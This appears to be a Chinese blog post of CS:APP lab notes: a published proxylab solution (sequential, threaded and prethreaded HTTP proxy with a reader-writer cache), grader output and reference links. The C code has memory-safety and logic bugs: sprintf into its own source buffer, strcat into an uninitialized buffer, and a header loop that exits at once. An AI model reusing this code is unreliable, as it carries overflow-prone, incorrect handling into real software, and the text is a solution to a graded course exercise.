Checking mm_malloc for correctness, efficiency, and performance.
Reading tracefile: cp-decl-bal.rep
Checking mm_malloc for correctness, efficiency, and performance.
Reading tracefile: expr-bal.rep
Checking mm_malloc for correctness, efficiency, and performance.
Reading tracefile: coalescing-bal.rep
Checking mm_malloc for correctness, efficiency, and performance.
Reading tracefile: random-bal.rep
Checking mm_malloc for correctness, efficiency, and performance.
Reading tracefile: random2-bal.rep
Checking mm_malloc for correctness, efficiency, and performance.
Reading tracefile: binary-bal.rep
Checking mm_malloc for correctness, efficiency, and performance.
Reading tracefile: binary2-bal.rep
Checking mm_malloc for correctness, efficiency, and performance.
Reading tracefile: realloc-bal.rep
Checking mm_malloc for correctness, efficiency, and performance.
Reading tracefile: realloc2-bal.rep
Checking mm_malloc for correctness, efficiency, and performance.

Results for mm malloc:
trace  valid  util     ops      secs  Kops
 0       yes   99%    5694  0.008612   661
 1       yes   99%    5848  0.008185   714
 2       yes   99%    6648  0.012927   514
 3       yes  100%    5380  0.009847   546
 4       yes   66%   14400  0.000116124352
 5       yes   91%    4800  0.008855   542
 6       yes   92%    4800  0.008498   565
 7       yes   55%   12000  0.174346    69
 8       yes   51%   24000  0.314996    76
 9       yes   80%   14401  0.000219 65608
10       yes   46%   14401  0.000106135858
Total          80%  112372  0.546707   206

Perf index = 48 (util) + 14 (thru) = 62/100

Lab8-proxylab

Web Proxy 是 Web 浏览器和服务器之间的一个中间程序。我们日常使用浏览器访问某个网站时,浏览器不是直接请求服务器来获取内容的,而是联系 Proxy,Proxy 转发请求到服务器,服务器回复 Proxy 后,Proxy 再将回复发送到浏览器。

Part I: Implementing a sequential web proxy

  • proxy.c
#include <stdio.h>
#include "csapp.h"

/* Recommended max cache and object sizes */
#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400

/* You won't lose style points for including this long line in your code */
static const char *user_agent_hdr = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3\r\n";
static const char *conn_hdr = "Connection: close\r\n";
static const char *proxy_hdr = "Proxy-Connection: close\r\n";

void doit(int fd);
int parse_uri(char* uri, char* hostname, char* filename, char* port);
void build_request(rio_t *real_client, char *new_request, char *hostname, char *port);
void clienterror(int fd, char *cause, char *errnum, char *shortmsg, char *longmsg);

int main(int argc, char **argv)
{
    int listenfd, connfd;
    char hostname[MAXLINE], port[MAXLINE];

    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }

    listenfd = Open_listenfd(argv[1]);
    while (1) {
        clientlen = sizeof(clientaddr);
        connfd = Accept(listenfd, (SA*)&clientaddr, &clientlen);

        Getnameinfo((SA*)&clientaddr, clientlen, hostname, MAXLINE, port, MAXLINE, 0);
        printf("Accepted connection from (%s, %s)\n", hostname, port);

        doit(connfd);
        Close(connfd);
    }

    return 0;
}

void doit(int fd)
{
    int servfd;

    char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
    char hostname[MAXLINE], filename[MAXLINE], port[MAXLINE];

    rio_t rio, server_rio;

    Rio_readinitb(&rio, fd);
    if (!Rio_readlineb(&rio, buf, MAXLINE))
        return;

    sscanf(buf, "%s %s %s", method, uri, version);

    if (strcasecmp(method, "GET")) {
        clienterror(fd, method, "501", "Not Implemented", "Tiny does not implement this method");
        return;
    }
    
    parse_uri(uri, hostname, filename, port);

    /* 建立与服务器的连接 */
    servfd = Open_clientfd(hostname, port);
    if (servfd < 0) {
        printf("connection failed\n");
        return;
    }

    /* 将从客户端收到的请求转发给服务端 */
    char new_request[MAXLINE];
    sprintf(new_request, "GET %s HTTP/1.0\r\n", filename);
    build_request(&rio, new_request, hostname, port);
    Rio_writen(servfd, new_request, strlen(new_request));

    /* 将从服务端收到的数据转发给客户端 */
    Rio_readinitb(&server_rio, servfd);
    size_t n;
    while ((n = Rio_readlineb(&server_rio, buf, MAXLINE)) != 0) {
        Rio_writen(fd, buf, n);
    }
    Close(servfd);
}

void build_request(rio_t *real_client, char *new_request, char *hostname, char *port) 
{
    char temp_buf[MAXLINE];

    // 获取client的请求报文
    while (Rio_readlineb(real_client, temp_buf, MAXLINE) > 0) {
        if (strstr(temp_buf, "\r\n")) break;  // end

        // 忽略以下几个字段的信息
        if (strstr(temp_buf, "Host:")) continue;
        if (strstr(temp_buf, "User-Agent:")) continue;
        if (strstr(temp_buf, "Connection:")) continue;
        if (strstr(temp_buf, "Proxy Connection:")) continue;

        sprintf(new_request, "%s%s", new_request, temp_buf);
        printf("%s\n", new_request);
        fflush(stdout);
    }
    sprintf(new_request, "%sHost: %s:%s\r\n", new_request, hostname, port);
    sprintf(new_request, "%s%s%s%s", new_request, user_agent_hdr, conn_hdr, proxy_hdr);
    // every HTTP request is terminated by an empty line: "\r\n"
    sprintf(new_request, "%s\r\n", new_request);
}

int parse_uri(char* uri, char* hostname, char* filename, char* port)
{
    char* hostname_pos, *filename_pos, *port_pos;

    char* http_pos = strstr(uri, "//");
    if (!http_pos) {
        hostname_pos = uri;
    }
    else {
        hostname_pos = http_pos + 2;
    }

    port_pos = strstr(hostname_pos, ":");
    if (!port_pos) {
        strcpy(port, "80");
        filename_pos = strstr(hostname_pos, "/");
        strcpy(filename, filename_pos);
        *filename_pos = '\0';
    }
    else {
        int portnum;
        sscanf(port_pos + 1, "%d%s", &portnum, filename);
        sprintf(port, "%d", portnum);
        *port_pos = '\0';
    }

    strcpy(hostname, hostname_pos);

    return 0;
}

void clienterror(int fd, char *cause, char *errnum, char *shortmsg, char *longmsg) 
{
    char buf[MAXLINE];

    /* Print the HTTP response headers */
    sprintf(buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-type: text/html\r\n\r\n");
    Rio_writen(fd, buf, strlen(buf));

    /* Print the HTTP response body */
    sprintf(buf, "<html><title>Tiny Error</title>");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf,
            "<body bgcolor="
            "ffffff"
            ">\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "%s: %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "<p>%s: %s\r\n", longmsg, cause);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "</p><hr><em>The Tiny Web server</em>\r\n");
    Rio_writen(fd, buf, strlen(buf));
}

Part II: Dealing with multiple concurrent requests

多线程

  • proxy.c
int main(int argc, char **argv)
{
    int listenfd, connfd;
    char hostname[MAXLINE], port[MAXLINE];

    pthread_t tid;

    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }

    listenfd = Open_listenfd(argv[1]);
    while (1) {
        clientlen = sizeof(clientaddr);
        connfd = Accept(listenfd, (SA*)&clientaddr, &clientlen);

        Getnameinfo((SA*)&clientaddr, clientlen, hostname, MAXLINE, port, MAXLINE, 0);
        printf("Accepted connection from (%s, %s)\n", hostname, port);

        Pthread_create(&tid, NULL, thread, (void*)&connfd);
    }

    return 0;
}

void thread(void* v)
{
    int fd = *(int*)v;
    Pthread_detach(pthread_self());
    doit(fd);
    close(fd);
}

预线程化技术(生产者-消费者模型)

生产者和消费者线程共享一个有 n 个槽的优先缓冲区,生产者反复地生成新的项目,并把它们插入到缓冲区中。消费者线程不断从缓冲区中取出,这些项目然后使用它们。因为插入和取出项目都涉及更新共享变量,所以我们必须保证对缓冲区地访问是互斥的,并调度对缓冲区地访问:

如果没有槽位:生产者必须等待;如果没有项目:消费者必须等待。

在预线程化的服务器中,客户端就是生产者,不断产生连接;Proxy 就是消费者,不断选中客户端连接。

  • proxy.c
#define NTHREADS 4
#define SBUFSIZE 16

typedef struct {
    int* buf;    /* Buffer array */
    int n;       /* Maximum number of slots */
    int front;   /* buf[(front+1) % n] is first item */
    int rear;    /* buf[rear % n] is last item */
    sem_t mutex; /* Protects access to buf */
    sem_t slots; /* Counts available slots */
    sem_t items; /* Counts available items */
} sbuf_t;

sbuf_t sbuf;     /* Shared buffer of connected descriptors */


int main(int argc, char **argv)
{
    int listenfd, connfd;
    char hostname[MAXLINE], port[MAXLINE];

    pthread_t tid;

    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }

    listenfd = Open_listenfd(argv[1]);

    subf_init(&sbuf, SBUFSIZE);

    for (int i = 0; i < NTHREADS; ++i) {
        Pthread_create(&tid, NULL, thread, NULL);
    }

    while (1) {
        clientlen = sizeof(clientaddr);
        connfd = Accept(listenfd, (SA*)&clientaddr, &clientlen);

        Getnameinfo((SA*)&clientaddr, clientlen, hostname, MAXLINE, port, MAXLINE, 0);
        printf("Accepted connection from (%s, %s)\n", hostname, port);

        sbuf_insert(&sbuf, connfd);
    }

    return 0;
}

void thread(void* v)
{
    Pthread_detach(pthread_self());

    while (1) {
        int connfd = sbuf_remove(&sbuf);
        doit(connfd);
        close(connfd);
    }
}

void subf_init(sbuf_t *sp, int n)
{
    sp->buf = calloc(n, sizeof(n));
    sp->n = n;
    sp->front = 0;
    sp->rear = 0;

    Sem_init(&sp->mutex, 0, 1);
    Sem_init(&sp->slots, 0, n);
    Sem_init(&sp->items, 0, 0);
}

void subf_deinit(sbuf_t *sp)
{
    Free(sp->buf);
}

void sbuf_insert(sbuf_t *sp, int item)
{
    P(&sp->slots);                                /* Wait for available slot */
    P(&sp->mutex);                                /* Lock the buffer */
    sp->buf[(++sp->rear) % (sp->n)] = item;       /* Insert the item */
    V(&sp->mutex);                                /* Unlock the buffer */
    V(&sp->items);                                /* Announce available item */
}

int sbuf_remove(sbuf_t *sp)
{
    int item;
    P(&sp->items);                                /* Wait for available item */
    P(&sp->mutex);
    item = sp->buf[(++sp->front) % (sp->n)];      /* Remove the item */
    V(&sp->mutex);
    V(&sp->slots);                                /* Announce available slot */
    return item;
}

Part III: Caching web objects

#include <stdio.h>
#include "csapp.h"

/* Recommended max cache and object sizes */
#define MAX_CACHE_SIZE 1049000
#define MAX_OBJECT_SIZE 102400
#define MAX_CHCHE 10

#define NTHREADS 4
#define SBUFSIZE 16

#define TRUE  1
#define FALSE 0

/* You won't lose style points for including this long line in your code */
static const char *user_agent_hdr = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3\r\n";
static const char *conn_hdr = "Connection: close\r\n";
static const char *proxy_hdr = "Proxy-Connection: close\r\n";

typedef struct {
    char uri[MAXLINE];
    char obj[MAX_OBJECT_SIZE];

    time_t t;
} Cache;

Cache cache[MAX_CHCHE];

typedef struct {
    int read_cnt;  // 读者数量
    sem_t w;
    sem_t mutex;
} RWLock;

RWLock rwLock;

typedef struct {
    int* buf;    /* Buffer array */
    int n;       /* Maximum number of slots */
    int front;   /* buf[(front+1) % n] is first item */
    int rear;    /* buf[rear % n] is last item */
    sem_t mutex; /* Protects access to buf */
    sem_t slots; /* Counts available slots */
    sem_t items; /* Counts available items */
} sbuf_t;

sbuf_t sbuf;     /* Shared buffer of connected descriptors */

void doit(int fd);
int parse_uri(char* uri, char* hostname, char* filename, char* port);
void build_request(rio_t *real_client, char *new_request, char *hostname, char *port);
void clienterror(int fd, char *cause, char *errnum, char *shortmsg, char *longmsg);
void thread(void* v);

void subf_init(sbuf_t *sp, int n);
void subf_deinit(sbuf_t *sp);
void sbuf_insert(sbuf_t *sp, int item);
int sbuf_remove(sbuf_t *sp);

void init_cache();
char* get_cache(const char* uri);
void update_cache(const char* uri, const char* buf);

int main(int argc, char **argv)
{
    int listenfd, connfd;
    char hostname[MAXLINE], port[MAXLINE];

    pthread_t tid;

    socklen_t clientlen;
    struct sockaddr_storage clientaddr;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }

    init_cache();

    listenfd = Open_listenfd(argv[1]);

    subf_init(&sbuf, SBUFSIZE);

    for (int i = 0; i < NTHREADS; ++i) {
        Pthread_create(&tid, NULL, thread, NULL);
    }

    while (1) {
        clientlen = sizeof(clientaddr);
        connfd = Accept(listenfd, (SA*)&clientaddr, &clientlen);

        Getnameinfo((SA*)&clientaddr, clientlen, hostname, MAXLINE, port, MAXLINE, 0);
        printf("Accepted connection from (%s, %s)\n", hostname, port);

        sbuf_insert(&sbuf, connfd);
    }

    return 0;
}

void thread(void* v)
{
    Pthread_detach(pthread_self());

    while (1) {
        int connfd = sbuf_remove(&sbuf);
        doit(connfd);
        close(connfd);
    }
}

void subf_init(sbuf_t *sp, int n)
{
    sp->buf = calloc(n, sizeof(n));
    sp->n = n;
    sp->front = 0;
    sp->rear = 0;

    Sem_init(&sp->mutex, 0, 1);
    Sem_init(&sp->slots, 0, n);
    Sem_init(&sp->items, 0, 0);
}

void subf_deinit(sbuf_t *sp)
{
    Free(sp->buf);
}

void sbuf_insert(sbuf_t *sp, int item)
{
    P(&sp->slots);                                /* Wait for available slot */
    P(&sp->mutex);                                /* Lock the buffer */
    sp->buf[(++sp->rear) % (sp->n)] = item;       /* Insert the item */
    V(&sp->mutex);                                /* Unlock the buffer */
    V(&sp->items);                                /* Announce available item */
}

int sbuf_remove(sbuf_t *sp)
{
    int item;
    P(&sp->items);                                /* Wait for available item */
    P(&sp->mutex);
    item = sp->buf[(++sp->front) % (sp->n)];      /* Remove the item */
    V(&sp->mutex);
    V(&sp->slots);                                /* Announce available slot */
    return item;
}

void doit(int fd)
{
    int servfd;

    char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
    char hostname[MAXLINE], filename[MAXLINE], port[MAXLINE];

    rio_t rio, server_rio;

    Rio_readinitb(&rio, fd);
    if (!Rio_readlineb(&rio, buf, MAXLINE))
        return;  

    sscanf(buf, "%s %s %s", method, uri, version);

    if (strcasecmp(method, "GET")) {
        clienterror(fd, method, "501", "Not Implemented", "Tiny does not implement this method");
        return;
    }

    char uri_copy[MAXLINE];
    strcpy(uri_copy, uri);
    char* ret = get_cache(uri_copy);
    if (ret) {
        Rio_writen(fd, ret, strlen(ret));
        free(ret);
        return;
    }
    
    parse_uri(uri, hostname, filename, port);

    /* 建立与服务器的连接 */
    servfd = Open_clientfd(hostname, port);
    if (servfd < 0) {
        printf("connection failed\n");
        return;
    }

    /* 将从客户端收到的请求转发给服务端 */
    char new_request[MAXLINE];
    sprintf(new_request, "GET %s HTTP/1.0\r\n", filename);
    build_request(&rio, new_request, hostname, port);
    Rio_writen(servfd, new_request, strlen(new_request));

    /* 将从服务端收到的数据转发给客户端 */
    Rio_readinitb(&server_rio, servfd);
    size_t total = 0;
    size_t n;
    char newcache[MAX_OBJECT_SIZE];
    while ((n = Rio_readlineb(&server_rio, buf, MAXLINE)) != 0) {
        Rio_writen(fd, buf, n);
        total += n;
        strcat(newcache, buf);
    }

    if (total < MAX_OBJECT_SIZE) {
        update_cache(uri_copy, newcache);
    }
    Close(servfd);
}

void build_request(rio_t *real_client, char *new_request, char *hostname, char *port) 
{
    char temp_buf[MAXLINE];

    // 获取client的请求报文
    while (Rio_readlineb(real_client, temp_buf, MAXLINE) > 0) {
        if (strstr(temp_buf, "\r\n")) break;  // end

        // 忽略以下几个字段的信息
        if (strstr(temp_buf, "Host:")) continue;
        if (strstr(temp_buf, "User-Agent:")) continue;
        if (strstr(temp_buf, "Connection:")) continue;
        if (strstr(temp_buf, "Proxy Connection:")) continue;

        sprintf(new_request, "%s%s", new_request, temp_buf);
        printf("%s\n", new_request);
        fflush(stdout);
    }
    sprintf(new_request, "%sHost: %s:%s\r\n", new_request, hostname, port);
    sprintf(new_request, "%s%s%s%s", new_request, user_agent_hdr, conn_hdr, proxy_hdr);
    // every HTTP request is terminated by an empty line: "\r\n"
    sprintf(new_request, "%s\r\n", new_request);
}

int parse_uri(char* uri, char* hostname, char* filename, char* port)
{
    char* hostname_pos, *filename_pos, *port_pos;

    char* http_pos = strstr(uri, "//");
    if (!http_pos) {
        hostname_pos = uri;
    }
    else {
        hostname_pos = http_pos + 2;
    }

    port_pos = strstr(hostname_pos, ":");
    if (!port_pos) {
        strcpy(port, "80");
        filename_pos = strstr(hostname_pos, "/");
        strcpy(filename, filename_pos);
        *filename_pos = '\0';
    }
    else {
        int portnum;
        sscanf(port_pos + 1, "%d%s", &portnum, filename);
        sprintf(port, "%d", portnum);
        *port_pos = '\0';
    }

    strcpy(hostname, hostname_pos);

    return 0;
}

void clienterror(int fd, char *cause, char *errnum, char *shortmsg, char *longmsg) 
{
    char buf[MAXLINE];

    /* Print the HTTP response headers */
    sprintf(buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "Content-type: text/html\r\n\r\n");
    Rio_writen(fd, buf, strlen(buf));

    /* Print the HTTP response body */
    sprintf(buf, "<html><title>Tiny Error</title>");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf,
            "<body bgcolor="
            "ffffff"
            ">\r\n");
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "%s: %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "<p>%s: %s\r\n", longmsg, cause);
    Rio_writen(fd, buf, strlen(buf));
    sprintf(buf, "</p><hr><em>The Tiny Web server</em>\r\n");
    Rio_writen(fd, buf, strlen(buf));
}

void init_cache()
{
    for (int i = 0; i < MAX_CHCHE; ++i) 
    {
        cache[i].t = 0;
    }
    rwLock.read_cnt = 0;
    Sem_init(&rwLock.w, 0, 1);
    Sem_init(&rwLock.mutex, 0, 1);
}

char* get_cache(const char* uri)
{
    char* ret = NULL;

    P(&rwLock.mutex);
    rwLock.read_cnt++;
    if (rwLock.read_cnt == 1) {
        P(&rwLock.w);
    }
    V(&rwLock.mutex);

    time_t curt = time(0);
    for (int i = 0; i < MAX_CHCHE; ++i)  
    {
        if (!strcasecmp(cache[i].uri, uri))
        {
            cache[i].t = curt;
            int len = strlen(cache[i].obj);
            ret = (char*)Malloc(len);
            strcpy(ret, cache[i].obj);
            break;
        }
    }

    P(&rwLock.mutex);
    rwLock.read_cnt--;
    if (rwLock.read_cnt == 0) {
        V(&rwLock.w);
    }
    V(&rwLock.mutex);

    return ret;
}

void update_cache(const char* uri, const char* buf)
{
    P(&rwLock.w);

    int minTIndex = 0;
    for (int i = 1; i < MAX_CHCHE; ++i) {
        if (cache[i].t < cache[minTIndex].t) {
            minTIndex = i;
        }
    }

    cache[minTIndex].t = time(0);
    strcpy(cache[minTIndex].uri, uri);
    strcpy(cache[minTIndex].obj, buf);

    V(&rwLock.w);
}
  • 运行结果
jason@jason-virtual-machine:~/csapp/csapplab/proxylab/proxylab-handout$ ./driver.sh 
*** Basic ***
Starting tiny on 1193
Starting proxy on 22411
1: home.html
   Fetching ./tiny/home.html into ./.proxy using the proxy
   Fetching ./tiny/home.html into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
2: csapp.c
   Fetching ./tiny/csapp.c into ./.proxy using the proxy
   Fetching ./tiny/csapp.c into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
3: tiny.c
   Fetching ./tiny/tiny.c into ./.proxy using the proxy
   Fetching ./tiny/tiny.c into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
4: godzilla.jpg
   Fetching ./tiny/godzilla.jpg into ./.proxy using the proxy
   Fetching ./tiny/godzilla.jpg into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
5: tiny
   Fetching ./tiny/tiny into ./.proxy using the proxy
   Fetching ./tiny/tiny into ./.noproxy directly from Tiny
   Comparing the two files
   Success: Files are identical.
Killing tiny and proxy
basicScore: 40/40

*** Concurrency ***
Starting tiny on port 14536
Starting proxy on port 31514
Starting the blocking NOP server on port 10458
Trying to fetch a file from the blocking nop-server
Fetching ./tiny/home.html into ./.noproxy directly from Tiny
Fetching ./tiny/home.html into ./.proxy using the proxy
Checking whether the proxy fetch succeeded
Success: Was able to fetch tiny/home.html from the proxy.
Killing tiny, proxy, and nop-server
concurrencyScore: 15/15

*** Cache ***
Starting tiny on port 11515
Starting proxy on port 2644
Fetching ./tiny/tiny.c into ./.proxy using the proxy
Fetching ./tiny/home.html into ./.proxy using the proxy
Fetching ./tiny/csapp.c into ./.proxy using the proxy
Killing tiny
Fetching a cached copy of ./tiny/home.html into ./.noproxy
Success: Was able to fetch tiny/home.html from the cache.
Killing proxy
cacheScore: 15/15

totalScore: 70/70

参考资料

  • https://zhuanlan.zhihu.com/p/497982541
  • https://blog.csdn.net/weixin_43362650/article/details/122770528
  • https://blog.csdn.net/weixin_26763955/article/details/113330104

others

学习资料

  • http://csapp.cs.cmu.edu/3e/labs.html
  • https://github.com/Exely/CSAPP-Labs
  • https://gitee.com/lin-xi-269/csapplab?_from=gitee_search
  • https://www.zhihu.com/column/c_1480603406519238656
  • https://www.zhihu.com/column/c_1458204480777273344
  • https://blog.csdn.net/aufefgavo/category_11261573.html
  • https://blog.csdn.net/df12138/article/details/122272107

上一篇 VSCode插件

下一篇 MIT 6.S081 LAB

Comments

Content